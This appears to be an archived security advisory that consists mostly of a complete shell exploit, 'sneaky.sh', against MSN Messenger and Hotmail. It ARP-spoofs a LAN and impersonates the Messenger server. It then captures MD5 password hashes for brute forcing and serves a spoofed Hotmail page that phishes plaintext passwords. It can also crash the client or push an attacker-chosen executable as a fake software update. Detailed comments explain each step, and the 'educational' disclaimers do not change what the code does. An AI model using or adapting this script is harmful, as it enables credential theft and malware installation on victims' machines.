COMMAND
Hotmail
SYSTEMS AFFECTED
Hotmail
PROBLEM
Gregory Duchemin found the following. This is a little sploit he wrote
for Linux to test a man in the middle attack against
Messenger/Hotmail. A kind of swiss army knife that:
- use the messenger scrambler bug to get passwords hashes
- spoof the hotmail site to retrieve plaintext passwords (since the
protocol is not encrypted) when users open their hotmail
account directly from messenger.
- remotely crash the client (i have not yet identified where exactly
the bug lives)
- upload a malicious program of your choice as an update. Since
it was not signed by microsoft, messenger will complain about
it but however will ask the user if he wishes to open it anyway.
Guess what the typical user's behavior will be? ;)
This script needs the useful arptool from Cristiano Lincoln Mattos
and our favorite web server (for hotmail spoofing and fake
messenger update).
#!/bin/sh
#
# //
# // sneaky.sh
# \\
# \\ Swiss army knife for Hotmail/Messenger
# //
# //
#
#
# "Spoofing/brute force/misconception/unexpected input Class Attack"
#
#
#
# AUTHOR: Gregory Duchemin ( Aka c3rb3r )
#
# COMPANY: NEUROCOM CANADA
# 1001 bd Maisonneuve Ouest, suite 200
# H3A 3C8 Montreal (Quebec) CANADA
# gdn@neurocom.com
# 514 908 6800
# http://www.securite-internet.com
#
# DATE: January 2001
#
# PURPOSE: Will spoof Hotmail/messenger server to recover user
# hotmail/password, crash messenger client, remotely inject and
# execute malicious exe on the victim host.
#
# NOTE: U will have to send arp responses by broadcasting your MAC/GATEWAY
# to the limited broadcast address/IP Broadcast
# otherwise u can still try it on your own gateway or from your provider ;)
# As a last resort, u can temporarily modify your DNS entry for
# messenger servers.
#
# REQUIRED: This sploit needs an "arptool"-like program and a local www server to work properly.
# =================================================================
##########################################################################################
#
# THIS SCRIPT IS JUST A PROOF OF CONCEPT AND SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY
#
##########################################################################################
# -------------------------------------------------------------------
# Configuration. Every setting is exported so the subshell that drives
# the protocol exchange (further down) inherits it.
# -------------------------------------------------------------------
# Pause between protocol replies, in microseconds (argument to usleep).
export delay=100000
###################################
# Things to be configured first
###################################
# IP address of messenger server to spoof
# It changes from client to client; check it by sniffing, or u can always
# assign as many virtual IPs as there are messenger server IPs.
# (Bound to eth0:0 below and used as nc's -s source address.)
export messenger="64.4.13.56"
# HTTP document root
# Both values end in "/"; the later concatenation $cgiroot"/$relogin"
# therefore produces a doubled slash, which the filesystem tolerates.
export cgiroot="/usr/local/apache/cgi-bin/"
export httproot="/usr/local/apache/htdocs/"
# Malicious exe location
# Only the existence test in mode 4 uses $malicious_path; html_cleaner
# copies plain $malicious (relative to the current directory).
export malicious_path="/tmp/"
export malicious="mmssetup.exe"
# Access URI : stupid garbage to hide the real url
# Used as the CGI script name under $cgiroot, as a directory name under
# $httproot, and sent to the client as Inbox-URL / Folders-URL.
export relogin="loginid=121EAAAAFBBDC2739121+CooKie=1212198AFEDCDFFF+TimeoftheDAY=231212+PASS=+LOGIN=+BIG-Brother"
# Messenger PORT
export PORT=1863
# real IP of our fake hotmail server, this host ip
# Embedded in the form action and in every URL sent to the client.
export MYIP="192.168.10.17"
# number of non read messages,
# need at least 1 to stimulate requests from the client
# Inserted into the Inbox-Unread / Folders-Unread headers of the
# notification MSG sent after the second CVR.
export nrmsg="10"
#number of non read folders
export nrfld="0"
#path/filename where to store hotmail password
# Not referenced anywhere else in the visible script; the mode 2 branch
# writes to /tmp/md5-password instead.
export PASSWORD_HERE="/tmp/hotmail-pass"
#path to reach your arp spoofer/flooder
# Started once in the background at startup and stopped by name
# (killall) from handl3r.
export ARP="arptool"
##########################################
# End of configuration options
##########################################
#######################################
# SIGINT handler, installed further down with `trap handl3r SIGINT`.
# Prints a closing message, runs html_cleaner, flushes disk buffers,
# stops the ARP tool by process name and exits.
# Globals:   ARP (read)
# Outputs:   status text to stdout
# Returns:   does not return; the bare `exit` reuses the status of the
#            last command, i.e. killall's
#######################################
handl3r()
{
echo
echo "Job finished, hope everything is ok...."
echo "see ./log for details."
echo
# html_cleaner is defined later in the file; it only exists once
# execution has passed its definition.
html_cleaner
sync
# Matches by process name, not by the PID saved in TID at startup.
killall "$ARP"
exit
}
#######################################
# Prints the usage text and the list of the four modes to stdout.
# Relies on `echo -e` being honoured, i.e. a bash-like /bin/sh.
# Globals:   none (uses $0 for the script name)
# Arguments: none
# Returns:   status of the last echo
#######################################
usage()
{
echo
echo -e "Usage: $0 [MODE] \n"
echo
echo "MODE: 1 / Hotmail web spoof for clear password recovery."
echo " 2 / Hotmail weakenned MD5 password Hash recovery for bruteforce."
echo " 3 / Messenger Remote CrAsh."
echo " 4 / Remote injection of malicious exe."
echo
echo
echo "NOTE: Don't forget to customize settings in the script (the first lines)."
echo "NOTE2: This proggy needs a local www and arptool or something similar to broadcast arp response to your LAN. I don't have lust to reinvente the wheel."
echo "NOTE3: USE IT ONLY FOR EDUCATIONNAL PURPOSE, NOTHING ILLEGAL PLEASE !"
echo
echo "DETAILS: attack 1/ will trojanize victim to get back a plain password."
echo " attack 2/ will ask for weak md5 hash."
echo " attack 3/ will crash the client.(exploitable b.overflow ?)"
echo " attack 4/ will upload a fake update, naively installed."
echo
echo "have a nice day"
echo " Gregory Duchemin ( c3rb3r@hotmail.com )"
echo
echo
}
# ---- Argument handling: exactly one positional MODE number ----
if [ $# -lt 1 ]; then
usage
exit
fi
export MODE="$1"
# Only values greater than 4 are rejected here; 0, negative numbers and
# non-numeric text (on which `test` itself errors out) all fall through
# to the per-mode checks further down.
if [ $MODE -gt 4 ]; then
usage
exit
fi
# IP_forwarding should be set to avoid detection/suspicion.
# Linux-specific sysctl key. Only an exit status of exactly 1 counts as
# failure, and even then the script carries on after the warning.
sysctl -w net.ipv4.conf.all.forwarding=1
if [ $? -eq 1 ]; then
usage
echo
echo
echo "Warning: Unable to set ip_forwarding (not a Linux ?), please configure the script."
echo
echo
fi
# automatic configuration of arp broadcasting/spoofing over the Lan.
# The three command substitutions supply, in order: the first "HWaddr"
# field printed by `ifconfig -a` (this host's MAC), the gateway column of
# the "UG" line from `netstat -rn`, and the first "inet" address from
# `ifconfig -a`. All three depend on the net-tools output format of the
# era. `2>&1 > /dev/null` is applied left to right, so stderr stays on
# the terminal and only stdout is discarded. The tool is started in the
# background, so the `$?` tested right after it is the status of
# launching the job (always 0), not of the tool itself.
echo
echo -n "ARP broadcast : "
$ARP -c 1 -s $(ifconfig -a | grep "HWaddr" | awk '{print $5}' | egrep -n '^[0-9]+' | egrep '^1:'| sed '1,$s/^1://') FF:FF:FF:FF:FF:FF $(netstat -rn | grep "UG" | awk '{print $2}' ) $(ifconfig -a | grep "inet" | awk -F ':' '{print $3}' | awk '{print $1}'| egrep -n '^[0-9]+' | egrep '^1:' | awk -F ':' '{print $2}') 2 2>&1 > /dev/null &
if [ $? -eq 1 ]; then
usage
echo
echo
echo "Error: I need something like arptool to do the job.. even if u have something else but similar, please do the appropriate modifications in the script."
echo
echo
exit
fi
echo "OK"
# PID of the background ARP job. Not referenced again in the visible
# script; handl3r stops the tool by name with killall instead.
export TID=$!
# ---- Per-mode banners ----
if [ $MODE = "2" ]; then
echo
echo "Weak MD5 hashes will be stored in /tmp/md5-password"
echo
echo
fi
# No code in the visible script writes /tmp/clear-password; in mode 1
# the spoofed form submits to http://$MYIP/response.html on the local
# web server.
if [ $MODE = "1" ]; then
echo
echo "Clear Hotmail/MSN passwords will be stored in /tmp/clear-password"
echo
echo
fi
if [ $MODE = "3" ]; then
echo
echo "Remote client may suddenly die...."
echo
echo
fi
# Mode 4 additionally requires the executable to exist under
# $malicious_path.
if [ $MODE = "4" ]; then
if [ ! -f $malicious_path"/$malicious" ]; then
echo
echo "Please first define the trojan (in the configuration section)"
echo
echo
exit 0
fi
echo
echo "Remote Injection of junky data."
echo
echo
fi
# From here on Ctrl-C runs handl3r. html_cleaner, which handl3r calls,
# is only defined once execution reaches its definition further down.
trap handl3r SIGINT
#######################################
# Writes the spoofed "re-enter your password" page as a CGI script named
# $cgiroot/$relogin: a #!/bin/sh wrapper that prints a Content-type
# header and the HTML through a here-doc. The form submits (GET) to
# http://$MYIP/response.html, and the e-mail address captured from the
# USR command (handed over in /tmp/.mail by the caller) is spliced into
# the page between the two echo chunks. Also writes the response.html
# landing page under $httproot.
# `function name()` is bash syntax, so this needs a bash-like /bin/sh.
# Globals:   cgiroot, httproot, relogin, MYIP (read)
# Inputs:    /tmp/.mail (read)
# Outputs:   $cgiroot/$relogin (created, made executable),
#            $httproot/response.html (created)
#######################################
function html_builder()
{
# First chunk: the CGI script header and the top of the page, written
# with `echo -n -e` so the \n escapes and the backslash-escaped quotes
# are interpreted.
echo -n -e "#!/bin/sh\n
cat << __MYGIFT__
Content-type:text/html\n
<html>
<!--
JUST A PROOF OF CONCEPT, USE IT FOR EDUCATIONNAL PURPOSES
-->
<body>
<div align=left>
<div id=layer1 style=\"width:100%; height:100%; position:absolute; left:0px; top:0px; z-index:0;\">
<div id=layer2 style=\"position:absolute; left:40; top:0; z-index:0;\">
<form name=\"passwordform\" action=\"http://$MYIP/response.html\" method=\"GET\" AUTOCOMPLETE=OFF >
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td colspan=2>
<table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td>
<a href=\"javascript:void()\" target=_top><img src=\"http://c3rber.multimania.com/horsemail.gif\" width=468 height=60 border=0 alt=""></a>
</td>
<td align=CENTER nowrap>
<img src=\"http://c3rber.multimania.com/pass.gif\" width=140 height=44 border=0 alt=\"Find Out More About Passport\"><br>
<a href=javascript:void() target=_top><font class=f size=2>Help</font></a><br>
</td></tr></table>
</td>
</tr><tr>
<td bgcolor=#cccc99><font class=f size=4><b>Please re-enter your password at your own risk</b></font></td>
<td valign=top><table width=100% border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor=#cccc99></td></tr></table></td>
</tr>
<tr><td height=6></td></tr>
<tr valign=top>
<td><font class=s>
</font>
</td>
<td rowspan=4><font class=s>
</font>
</font>
</td>
</tr>
<tr>
<td>
<font class=f size=2><b><" > $cgiroot"/$relogin"
# The captured address (written to /tmp/.mail by the USR branch of the
# main loop) lands here, between the two chunks.
cat /tmp/.mail >> $cgiroot"/$relogin"
# Second chunk: the password field, the rest of the page and the
# here-doc terminator.
echo -n -e "></b></font>
<input type=hidden name=\"domain&IDcookie=123515261725ABFFCDEEE&key-id=&passvalue=&domain-name=\" value=hotmail.com>
<table cellpadding=0 cellspacing=0>
<tr>
<td height=35 valign=middle><font class=sbd>Password</font> </td>
<td><input type=password name=PASSWORD size=16 maxlength=16></td>
<td width=22 valign=\"middle\" align=\"center\"> </td>
<td><input type=\"submit\" name=\"enter\" value=\"Sign in\"></td>
</tr>
<tr>
<td></td>
<td colspan=\"2\"><font class=\"f\" size=2><b><a href=\"javascript:void()\" target=\"_top\">Change
User</a></b></font></td>
</tr>
</table>
</form>
</table>
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td>
C3rb3r © 2001 Hotmail/Messenger/MSIE vulnerabilities proof of concept.
<a href=\"javascript:void()\">H0rsemail TERMS OF USE and NOTICES</a>
<a href=\"javascript:void()\"><font class=\"s\">untrusted Privacy Statement
</font></a>
</td>
</tr>
</table>
</div>
<p align=center>
<img src=\"http://c3rber.multimania.com/hotmail.jpg\" width=1280 height=950 border=0 >
</div>
</div>
</body>
</html>
\n__MYGIFT__\n\n">> $cgiroot"/$relogin"
# The generated file must be executable to run as a CGI script.
chmod a+x $cgiroot"/$relogin"
#echo "This is the false update for messenger." > $httproot"mmssetup.exe"
# Landing page the form submits to.
echo "<html><br><br><br><center>Thanx for your participation.</center><br><br>C3rb3r.</html>" > $httproot"response.html"
}
#######################################
# Tears down the spoofed pages and, despite the name, also stages the
# fake update file: removes the CGI script and response.html, creates
# the world-writable directory $httproot$relogin and copies $malicious
# (as given, i.e. relative to the current directory rather than
# $malicious_path) into it as mmssetup.exe. Called from the OUT branch
# of the main loop and from handl3r.
# Globals:   cgiroot, httproot, relogin, malicious (read)
# Returns:   status of the last rm
#######################################
html_cleaner()
{
rm -f $cgiroot"/$relogin"
mkdir -p $httproot"$relogin"
chmod a+rwx $httproot"$relogin"
cp -f $malicious $httproot"$relogin""/mmssetup.exe"
rm -f $httproot"response.html"
}
#IP ALIAS with messenger IP
# Adds the spoofed server address as alias eth0:0 (the interface name is
# hard-coded); nc below binds to it with -s. The exit status is not
# checked, so "OK" is printed regardless.
echo
echo -n "Interface configuration : "
ifconfig eth0:0 inet $messenger
echo "OK"
echo
echo "Waiting for a client n0w...."
echo
# things are getting serious now, this is the messenger automate:
# $flag tracks the CVR exchanges seen so far ("0" none, "1" one, "3"
# done). Once the loop starts it is updated in the subshell's copy only.
export flag="0"
# ./trace is created empty here and not used again in the visible script.
cat /dev/null > ./trace
# Main accept loop. Each pass starts one nc listener bound to the spoofed
# address ($messenger:$PORT); everything the client sends goes to ./log,
# while the subshell on the left of the pipe polls ./log and echoes its
# replies into nc's stdin, i.e. back to the client. Each handled command
# is lowercased in ./log so the next poll skips it; that rewrite is done
# as `cat ./log | sed ... > ./log`, with the same file read and truncated
# in one pipeline.
while true
do
sync
(
usleep $delay
# Polling loop; left only through the explicit `exit`s below or when nc
# goes away and the pipe breaks.
while true
do
# MSNP commands this automaton answers. $request is the command word and
# $num the client's transaction id, echoed back in every reply.
export parsed="$( egrep -e '(VER [0-9]{1,} ([A-Z0-9]){3,})|OUT|(INF [0-9]{1,})|(USR [0-9]{1,})|(SYN [0-9]{1,} [0-9]{1,})|(CVR [0-9]{1,})|(CHG [0-9]{1,})|(URL [0-9]{1,})' ./log)"
if [ "$parsed" != "" ]; then
sync
export request=$(echo $parsed | awk '{print $1}')
export num=$(echo $parsed | awk '{print $2}')
case "$request" in
# Protocol version negotiation: claim MSNP5/MSNP4 support.
VER)
usleep $delay
cat ./log | sed -e "s/VER/ver/" > ./log
echo -e "VER $num MSNP5 MSNP4 CVR0\r"
sync
usleep $delay
;;
# Auth-method query: advertise MD5. sed 's/.$/ /' swaps the trailing \r
# of $num for a space before it is reused.
INF)
cat ./log | sed -e "s/INF/inf/" > ./log
export new=$(echo $num | sed -e 's/.$/ /')
echo -e "INF $new""MD5\r"
usleep $delay
;;
# USR: field 4 is the step ("I" initial, anything else the response
# step); field 5 is the e-mail address or the MD5 response respectively.
USR)
cat ./log | sed -e "s/USR/usr/" > ./log
export ttype=$(echo $parsed | awk '{print $4}')
if [ "$ttype" = "I" ]; then
# Initial step: capture the address, generate the spoofed page with it,
# then send the MD5 challenge -- the current epoch time, or an empty
# challenge in mode 2.
export email=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')
echo "$email" > /tmp/.mail
html_builder
rm -f /tmp/.mail
if [ ! $MODE = "2" ]; then
echo -e "USR $num MD5 S "$(date "+%s")"\r"
else
echo -e "USR $num MD5 S \r"
fi
else
# Response step. Mode 2 answers with error 910, appends the hash (with
# $email from the earlier I step in this same subshell) to
# /tmp/md5-password and exits the subshell; other modes accept the login.
export password=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')
if [ $MODE = "2" ]; then
echo -e "910 $num \r"
usleep $delay
echo -e "\n\nHotmail password (MD5 hash) for $email is $password\n\n" >> /tmp/md5-password
sync
exit
fi
echo -e "USR $num OK $email $email\r"
fi
usleep $delay
;;
# SYN: send a hard-coded profile MSG (LoginTime = now) followed by the
# SYN acknowledgement carrying the client's version number (field 3).
SYN)
export syn=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $3}')
cat ./log | sed -e "s/SYN/syn/" > ./log
export time=$(date "+%s")
echo -e "MSG Hotmail Hotmail 331\r\nMIME-Versio\
n: 1.0\r\nContent-Type: text/x-msmsgspro\
file; charset=UTF-8\r\nLoginTime: $time\
\r\nEmailEnabled: 1\r\nMemberIdHigh: 84\
224\r\nMemberIdLow: 1114357868\r\nlang_pre\
ference: 1033\r\npreferredEmail: \r\ncount\
ry: CA\r\nPostalCode: \r\nGender: M\r\nAge:\
60\r\nsid: 507\r\nkv: 2\r\nMSPAuth: \
2AAAAAAA\
AD1ZbiLXW3pZ1*ag4qqsgrQYBo1M3vAfU6971a\
t3erLcBGzQ$$\r\n\r"
usleep $delay
echo -e "SYN $num $syn\r"
usleep $delay
sync
;;
# CVR (client version): handled twice per session, tracked by $flag.
# First time (flag "0"): reply with an update pointer on $MYIP, using the
# client's own version (field 8) or a bogus 12.666.666 in mode 4.
# Second time (flag "1"): replay the stored CHG line ($chg, empty unless
# a CHG was seen earlier in this subshell), send the initial-email
# notification MSG whose Inbox-URL / Folders-URL point at /$relogin,
# send a second CVR (Microsoft's patch URL, or mmssetup.exe on $MYIP in
# mode 4), set flag to "3", send the BPR lines, and in mode 3 send the
# ADD line and exit the subshell.
CVR)
export version=$(echo $parsed | awk '{print $8}')
cat ./log | sed -e "s/CVR/cvr/" > ./log
if [ "$flag" = "0" ]; then
if [ $MODE = "4" ]; then
echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\
ttp://$MYIP\
/$relogin""/$malicious http://$MYIP/$relogin""/$malicious\
\r"
else
echo -e "CVR $num $version $version 1.0.0863 h\
ttp://$MYIP/\
/mmssetup.exe http://$MYIP\
/\r"
fi
export flag="1"
else
if [ "$flag" = "1" ]; then
echo -e "$chg"
echo -e "MSG Hotmail Hotmail 223\r\nMIME-Versio\
n: 1.0\r\nContent-Type: text/x-msmsgsini\
tialemailnotification; charset=UTF-8\r\n\
\r\nInbox-Unread: $nrmsg \r\nFolders-Unread: $nrfld\
\r\nInbox-URL: /$relogin""\r\nFolders\
-URL: /$relogin""\r\nGet-URL: http\
//$MYIP\r\n\r"
if [ $MODE = "4" ]; then
echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\
ttp://$MYIP/\
mmssetup.exe http://$MYIP/\r"
else
echo -e "CVR $num $version $version 1.0.0863 h\
ttp://download.microsoft.com/download/\
msnmessenger/Patch/2.1/Win98/EN-US/msg\
strst.dll http://messenger.msn.com/\r"
fi
export flag="3"
echo -e "BPR $num C3rb3r@hotmail.com PHH\r"
echo -e "BPR $num C3rb3r@hotmail.com PHW\r\nBPR $num\
c3rb3r@hotmail.com PHM\r\nBPR $num c3rb3r@h\
otmail.com MOB N\r"
usleep $delay
if [ $MODE = "3" ]; then
echo -e "ADD 0 AL Crash Crash \r"
usleep $delay
exit 0
fi
fi
fi
usleep $delay
;;
# CHG: keep the raw line for replay by the second CVR branch.
CHG)
export chg=$( echo "$parsed"| egrep "CHG")
cat ./log | sed -e "s/CHG/chg/" > ./log
usleep $delay
;;
# OUT: client signed out; remove the spoofed pages and leave the
# subshell, which closes nc's stdin.
OUT)
html_cleaner
exit 0
;;
# URL: answer with a mailbox URL under /c/s.dll/$relogin on $MYIP.
URL)
cat ./log | sed -e "s/URL/url/" > ./log
echo -e "URL $num /www.hotmail.com http://"$MYIP"/c/s.dll/"$relogin 0"\
\r"
usleep $delay
;;
esac
fi
done
)| nc -w 5 -s $messenger -n -l -p $PORT > ./log 2>/dev/null
# nc has returned (client gone, idle timeout -w 5, or the subshell
# exited): report when the session ended with a sign-out.
# `! $? -eq 1` reads as "egrep did not fail to match".
egrep -e 'OUT' ./log > /dev/null
if [ ! $? -eq 1 ]; then
echo
echo "Victim has signed out...."
echo "see ./log for details."
echo
fi
done
SOLUTION
Nothing to do.